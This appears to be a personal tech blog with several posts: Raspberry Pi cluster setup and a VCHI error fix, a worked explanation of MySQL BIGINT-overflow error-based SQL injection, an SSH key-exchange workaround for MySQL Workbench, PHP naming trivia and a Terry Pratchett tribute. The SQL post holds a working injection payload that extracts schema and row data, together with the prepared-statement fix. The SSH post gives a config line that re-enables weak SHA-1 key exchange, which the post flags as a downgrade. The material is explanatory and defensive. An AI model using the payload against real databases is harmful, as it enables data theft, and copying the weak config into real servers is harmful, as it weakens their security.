Stacking multiple Raspberry Pis

For the Raspberry Pi cluster I wanted the boards stored neatly so that they stay easy to reach.

Why nicely storing them is important

Each Raspberry Pi requires a power cable and a network cable. With a single Raspberry Pi the cables are not an issue, but I am planning to use five as a baseline for my cluster. That many cables quickly become messy and make the cluster hard to reach.

Stacking the Raspberry Pis

Therefore I have selected a case that allows me to stack the Raspberry Pis on top of each other.

Image taken from AliExpress, where I purchased the item.

This case vents excess heat through the sides, which many case designs do not account for. Since I plan to use the Pis extensively they will likely run quite hot.

I plan to stack six Raspberry Pis on top of each other, so I have purchased three of these (two-high) products.

VCHI initialization failed on the Raspberry Pi, fixed

vcgencmd get_mem arm
VCHI initialization failed

Example showing the VCHI initialization failed error

If running vcgencmd on a Raspberry Pi gives VCHI initialization failed, the user you are running it as is not a member of the video group. vcgencmd talks to the GPU firmware through the /dev/vchiq device node, which Raspbian's udev rules make group-owned by video with no access for other users, so without that group membership the open of the device fails and vcgencmd reports VCHI initialization failed.

To add the group to your user, run:

sudo usermod -aG video <username>

Where <username> is the user you want to run vcgencmd as. The -a (append) flag matters: -G on its own replaces the user's supplementary groups, so sudo usermod -G video <username> would silently drop the user from every other group, sudo included.

Group membership is read at login, so the change only takes effect for new sessions: log out and back in (or reconnect over SSH) and the command will work. To use it immediately in the current session, run it under the new group instead, e.g. sg video -c 'vcgencmd get_mem arm'.

Why this problem occurs

This issue happens when vcgencmd is run by a user that is not a member of the video group. It typically occurs when you create a new user on the Raspberry Pi and do not give it the same groups as the default pi user (compare with: groups pi).

The fix above adds the missing video group to the new user.
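A small diagnostic script, added here as an example and not part of the original post. It reads the owning group straight off /dev/vchiq rather than assuming "video", checks the user's membership, applies the usermod fix only when asked, and prints the sg workaround so you can test without re-logging. It assumes GNU coreutils (stat -c) and sudo; the file name vchi_fix.sh is an assumption.

```shell
#!/bin/sh
# Added example, not from the original post. Diagnoses the cause of
# "VCHI initialization failed": vcgencmd opens /dev/vchiq, which Raspbian's
# udev rules make group-owned by "video", so the calling user must belong
# to that group. Assumes GNU coreutils (stat -c) and sudo for the fix step.

# in_group USER GROUP: exit 0 if USER's groups include GROUP
in_group() {
    id -nG "$1" 2>/dev/null | tr ' ' '\n' | grep -qxF "$2"
}

# device_group DEVICE: print the owning group of a device node, or "video"
# (the Raspbian default) when the node is absent, e.g. on a non-Pi test box
device_group() {
    stat -c '%G' "$1" 2>/dev/null || echo video
}

# ensure_vchi_access [USER]: add USER (default: current user) to the group
# owning /dev/vchiq unless already a member. Returns 0 when access already
# exists, 1 when the group was just added and a new login is still needed.
ensure_vchi_access() {
    user="${1:-$(id -un)}"
    grp="$(device_group /dev/vchiq)"
    if in_group "$user" "$grp"; then
        echo "$user is already in group $grp; vcgencmd should work"
        return 0
    fi
    echo "adding $user to group $grp"
    sudo usermod -aG "$grp" "$user"   # -a keeps the user's existing groups
    echo "log out and back in, or run now via: sg $grp -c 'vcgencmd get_mem arm'"
    return 1
}

# Only change anything when explicitly asked, so the file is safe to source:
#   sh vchi_fix.sh fix pi
if [ "${1:-}" = fix ]; then
    ensure_vchi_access "${2:-}"
fi
```

Run it as sh vchi_fix.sh fix <username>; without the fix argument it only defines the functions, which is handy for sourcing the checks into other provisioning scripts.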

Building a Raspberry Pi cluster

Today's post marks the official start of my Raspberry Pi cluster project. Here I will document the process of assembling, building, and running a small cluster. The posts will include code snippets, hardware diagrams and the results of various projects run on the cluster.

Aims of the project

The Raspberry Pi cluster is for exploring distributed computing from both a hardware and a software perspective. Some of the smaller projects planned include:

  • YouTube playlist syncing and download
  • Dynamic task management and distribution
  • MD5 hash calculators
  • Realtime Reddit thread analysis

But why a Raspberry Pi when it lacks power/RAM/etc.?

Many of the tasks I am planning for the Raspberry Pi can be run faster and more easily on a single computer. My (5 year old) laptop will have more RAM and processing power than the initial cluster. If I was going for pure power I would run these tasks on a GPU. However, the cluster is for experimenting with the process of writing for and working with a distributed environment.

Part of the reason I have chosen the Raspberry Pi is that it is readily available, relatively cheap, and there is a lot of support for running Linux on it. I am planning on running Raspbian Jessie PIXEL to begin with, with the possibility of switching to full Debian or Fedora later.

First steps to a Raspberry Pi Cluster

I already have one Raspberry Pi 1 Model B Rev 2 which I am going to start developing software on while I collect the other parts. During this time I will search around for a number of Raspberry Pis. My preference will be for the older versions so that I can buy more of them cheaply.

Powering them is going to be an investigative point, as I don't want to power them using multiple Raspberry Pi power cables: these are costly in larger numbers and will occupy lots of power sockets.

As I am expecting to buy a couple of different Raspberry Pi versions I am going to look for microSD cards that come with adapters. This is because the Raspberry Pi 1 Model B takes a full-size SD card and later models take a microSD card.

BIGINT Overflow Error Based SQL Injection

From MySQL 5.5 (specifically 5.5.5) onwards, a change in how BIGINT arithmetic overflow is handled can be abused for error-based SQL injection. The attack combines integer overflow (often called rollover or wraparound) with an injection point that lets you run arbitrary SQL.

The problem of integer rollover

Integer overflow happens when the result of an arithmetic operation does not fit in the fixed number of bits used to store it.

A 64-bit unsigned integer holds values from 0 to 2^64 - 1 (18446744073709551615). If the stored value is already at that maximum and you add one, the true result needs 65 bits, so the stored value wraps round to 0 instead. Similarly, subtracting from an unsigned 0 wraps round to the maximum.

This comes from the binary representation: the carry out of the top bit is simply discarded, so the value "rolls over". It is almost always unintended, yet in many languages (C being the classic case) it happens silently. Traditionally you had to check for it by hand; newer languages and runtimes increasingly detect it and raise an error instead.

How MySQL is affected by this

MySQL from version 5.5.5 does the latter: instead of silently wrapping, an overflowing BIGINT operation fails with ERROR 1690 (22003), "BIGINT UNSIGNED value is out of range in '...'". That is the right choice, since a silently wrapped number is radically wrong; the problem is what the error message contains.


The error message quotes the offending expression, and it quotes it after evaluating any subqueries inside it, so the result of an attacker-chosen subquery ends up in the text. If the website passes unsanitised input into a query and displays MySQL errors directly, you can wrap a subquery in an expression that is guaranteed to overflow (for example by subtracting ~0, the largest BIGINT UNSIGNED) and read the subquery's result off the error page.

Because the subquery can be anything that returns a single value, you can read information_schema first to learn the table and column names, and then pull out any data in the database one value per request, without guessing names. Full read access to the database usually means access to credentials and other sensitive information.

Fixing this exploit

The root cause is user input spliced into SQL text, and the fix is parameterised queries (prepared statements with bound parameters) rather than hand-rolled escaping, which is easy to get wrong; many websites still forget both. Suppressing MySQL errors on the page removes this particular leak, but it does not remove the injection: the same point is still exploitable blind (boolean or timing probes), by union-based techniques, or, where the driver allows stacked queries, by statements that modify data and potentially escalate privileges. Hide errors from users, but fix the query.

The original write-up of this technique, including example code and a full explanation, is available online. It is another example of why it is critically important never to trust user input.
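The whole chain as an added example, not code from the post or from the original write-up: the overflow, the leak through the error text, one injected probe against an assumed users table, and the prepared-statement fix. It targets MySQL 5.5.5 or later; the schema, table, column and input values are assumptions for illustration, and the quoted error text follows the form MySQL 5.x produces (check it against your target version; the message is also size-limited, so long values need SUBSTRING()).

```sql
-- Added example, not from the original post. Run with the mysql client on
-- MySQL >= 5.5.5. Schema, table and data below are assumed for illustration.
CREATE DATABASE IF NOT EXISTS demo;
USE demo;
CREATE TABLE users (
  id       INT PRIMARY KEY,
  username VARCHAR(32),
  password VARCHAR(64)
);
INSERT INTO users VALUES (1, 'admin', 'assumed_secret');

-- 1. The overflow. ~0 is 18446744073709551615, the largest BIGINT UNSIGNED.
--    Servers before 5.5.5 wrapped the sum to 0; 5.5.5+ refuses:
--    ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(~(0) + 1)'
SELECT ~0 + 1;

-- 2. The leak. The error quotes the expression with its subqueries already
--    evaluated. NOT(x) is 0 or 1, and either minus ~0 is below zero, which an
--    unsigned result cannot hold, so the error always fires and carries x.
--    ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in
--      '((not((select '5.7.31-log' from dual))) - ~(0))'   -- version string
SELECT !(SELECT * FROM (SELECT version()) x) - ~0;

-- 3. Injection. Assume the application builds
--      SELECT id FROM users WHERE username = '<input>'
--    by string concatenation and prints MySQL errors to the page. With the
--    (assumed) input
--      admin' OR !(SELECT * FROM (SELECT table_name FROM information_schema.tables
--                  WHERE table_schema = DATABASE() LIMIT 0,1) x) - ~0 --
--    the server runs the statement below and the error names the first table
--    in the current schema ('users'); LIMIT 1,1, 2,1 ... walk the rest, and
--    the same shape with a column name or a password value reads row data.
SELECT id FROM users
WHERE username = 'admin'
   OR !(SELECT * FROM (SELECT table_name FROM information_schema.tables
                       WHERE table_schema = DATABASE() LIMIT 0,1) x) - ~0 -- '
;

-- 4. Fix: bind the input instead of splicing it into SQL text. The same
--    payload is now only a string to compare against: no error, no leak,
--    and (as expected) no matching row.
PREPARE find_user FROM 'SELECT id FROM users WHERE username = ?';
SET @u = 'admin'' OR !(SELECT * FROM (SELECT version()) x) - ~0 -- ';
EXECUTE find_user USING @u;        -- Empty set
DEALLOCATE PREPARE find_user;
```

In application code the equivalent of step 4 is the driver's own parameter binding (PDO or mysqli prepared statements in PHP, for instance); the SET/PREPARE/EXECUTE form is just the way to show the same behaviour from the mysql client.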

MySQL Workbench and SSH key exchange algorithms

Newer OpenSSH server releases, such as the one shipped with Fedora 22, enable a smaller set of key exchange algorithms by default and drop the older SHA-1 based Diffie-Hellman exchanges.

The SSH client library bundled with older MySQL Workbench releases only supports some of those older exchanges, so client and server cannot agree on one and Workbench reports that it is unable to connect to the server. The quick fix is to re-enable the older exchanges on the server.

Adding this line to /etc/ssh/sshd_config and restarting sshd fixes it:

KexAlgorithms curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1

Credit: http://serverfault.com/questions/692060/mysql-workbench-with-debian-jessie-tcp-ip-over-ssh-does-not-work
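That line re-enables diffie-hellman-group1-sha1, a 1024-bit group that is no longer considered safe, for every client of that server, and KexAlgorithms cannot be scoped to one client in a Match block, so the cost is a server-wide downgrade. The better options are to update Workbench, or to keep sshd's defaults and give Workbench a plain TCP connection through a port forward made by the system ssh client, which negotiates with its own modern key exchange list. The script below is an added example, not from the post or the serverfault answer: it flags a sshd_config that re-enables the SHA-1 or 1024-bit exchanges and prints the tunnel command. The host and user names are assumptions.

```shell
#!/bin/sh
# Added example, not from the original post. Audits a sshd_config for a
# KexAlgorithms line that re-enables SHA-1 or 1024-bit Diffie-Hellman key
# exchange, and prints the client-side alternative (an ssh port forward) that
# leaves the server's defaults in place. Host/user names are assumptions.

# The line from the post, which re-enables the two weakest exchanges ...
WEAK_LINE='KexAlgorithms curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1'
# ... and the same line with them removed.
HARDENED_LINE='KexAlgorithms curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256'

# kex_audit CONFIG: exit 1 if the active KexAlgorithms line lists the
# 1024-bit group1 exchange or a SHA-1 hashed exchange; exit 0 otherwise.
# No KexAlgorithms line means sshd's defaults apply, which passes.
kex_audit() {
    weak='diffie-hellman-group1-sha1|diffie-hellman-group-exchange-sha1|diffie-hellman-group14-sha1'
    # sshd honours the first occurrence of a keyword, so take the first
    # un-commented KexAlgorithms line.
    line=$(grep -E '^[[:space:]]*KexAlgorithms[[:space:]]' "$1" | head -n 1)
    [ -z "$line" ] && return 0
    if printf '%s\n' "$line" | grep -qE "$weak"; then
        printf 'weak key exchange enabled in %s: %s\n' "$1" "$line" >&2
        return 1
    fi
    return 0
}

# tunnel_cmd USER HOST [LOCAL_PORT]: print the ssh invocation that forwards a
# local port to MySQL on the server. Workbench then connects to
# 127.0.0.1:LOCAL_PORT over plain TCP and never negotiates kex itself.
tunnel_cmd() {
    printf 'ssh -N -L %s:127.0.0.1:3306 %s@%s\n' "${3:-3307}" "$1" "$2"
}

# Demo when run as "sh kex_check.sh demo": audit both lines, print the tunnel.
if [ "${1:-}" = demo ]; then
    tmp=$(mktemp)
    printf '%s\n' "$WEAK_LINE" > "$tmp"
    kex_audit "$tmp" || echo "-> replace with: $HARDENED_LINE"
    printf '%s\n' "$HARDENED_LINE" > "$tmp"
    kex_audit "$tmp" && echo "hardened line passes"
    rm -f "$tmp"
    tunnel_cmd dbadmin db.example.org
fi
```

Run the printed ssh command in a terminal, then point Workbench at 127.0.0.1:3307 with the Standard (TCP/IP) connection method rather than "TCP/IP over SSH"; the audit function can be dropped into a configuration check that runs before sshd is restarted.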

Why are PHP’s function names a mess?

I have always wondered about this; the naming is exceptionally hit and miss and there is no real standard. I recently found the reason on the internet:

Well, there were other factors in play there. htmlspecialchars was a very early function. Back when PHP had less than 100 functions and the function hashing mechanism was strlen(). In order to get a nice hash distribution of function names across the various function name lengths names were picked specifically to make them fit into a specific length bucket. This was circa late 1994 when PHP was a tool just for my own personal use and I wasn't too worried about not being able to remember the few function names.

- Rasmus Lerdorf (citation)

So it turns out they were very specifically named to fit nicely into the hashing function. Obviously this isn't needed today, but it is an exceptionally old artefact of PHP's past that never got changed.

RIP Terry Pratchett – Long shall you live on in the Clacks

In one of his books, Going Postal:

The Hour of the Dead was when men died. And when a man died, they sent him home by clacks. Moist’s mouth dropped open. ‘Huh?’

‘That’s what they call it,’ said Harry. ‘Not lit’rally, o’ course. But they send his name from one end of the Trunk to the other, ending up at the tower nearest his home.’

‘Yeah, but they say sometimes the person stays on in the towers, somehow,’ said Jim. ‘“Living in the Overhead”, they call it.’

Sir Terry will always live on in the overhead of Reddit.

A lot of what travelled on the Grand Trunk was called the Overhead. It was instructions to towers, reports, messages about messages, even chatter between operators, although this was strictly forbidden these days. It was all in code. It was very rare you got Plain in the Overhead. But now . . . ‘There it goes again,’ she said. ‘It must be wrong. It’s got no origin code and no address. It’s Overhead, but it’s in Plain.’ On the other side of the tower, sitting in a seat facing the opposite direction because he was operating the up-line, was Roger, who was seventeen and already working for his tower-master certificate. His hand didn’t stop moving as he said: ‘What did it say?’

‘There was GNU, and I know that’s a code, and then just a name. It was John Dearheart. Was it a—’

‘You sent it on?’ said Grandad. Grandad had been hunched in the corner, repairing a shutter box in this cramped shed halfway up the tower. Grandad was the tower-master and had been everywhere and knew everything. Everyone called him Grandad. He was twenty-six. He was always doing something in the tower when she was working the line, even though there was always a boy in the other chair. She didn’t work out why until later. ‘Yes, because it was a G code,’ said Princess. ‘Then you did right. Don’t worry about it.’

‘Yes, but I’ve sent that name before. Several times. Upline and downline. Just a name, no message or anything!’ She had a sense that something was wrong, but she went on: ‘I know a U at the end means it has to be turned round at the end of the line, and an N means Not Logged.’ This was showing off, but she’d spent hours reading the cypher book. ‘So it’s just a name, going up and down all the time! Where’s the sense in that?’ Something was really wrong. Roger was still working his line, but he was staring ahead with a thunderous expression. Then Grandad said: ‘Very clever, Princess. You’re dead right.’

‘Hah!’ said Roger. ‘I’m sorry if I did something wrong,’ said the girl meekly. ‘I just thought it was strange. Who’s John Dearheart?’

‘He . . . fell off a tower,’ said Grandad. ‘Hah!’ said Roger, working his shutters as if he suddenly hated them. ‘He’s dead?’ said Princess. ‘Well, some people say—’ Roger began. ‘Roger!’ snapped Grandad. It sounded like a warning. ‘I know about Sending Home,’ said Princess. ‘And I know the souls of dead linesmen stay on the Trunk.’

‘Who told you that?’ said Grandad. Princess was bright enough to know that someone would get into trouble if she was too specific. ‘Oh, I just heard it,’ she said airily. ‘Somewhere.’

‘Someone was trying to scare you,’ said Grandad, looking at Roger’s reddening ears. It hadn’t sounded scary to Princess. If you had to be dead, it seemed a lot better to spend your time flying between the towers than lying underground. But she was bright enough, too, to know when to drop a subject. It was Grandad who spoke next, after a long pause broken only by the squeaking of the new shutter bars. When he did speak, it was as if something was on his mind. ‘We keep that name moving in the Overhead,’ he said, and it seemed to Princess that the wind in the shutter arrays above her blew more forlornly, and the everlasting clicking of the shutters grew more urgent. ‘He’d never have wanted to go home. He was a real linesman. His name is in the code, in the wind in the rigging and the shutters. Haven’t you ever heard the saying “A man’s not dead while his name is still spoken”?’

GNU Terry Pratchett

All web servers under my control now return this header. You can too, with http://www.gnuterrypratchett.com/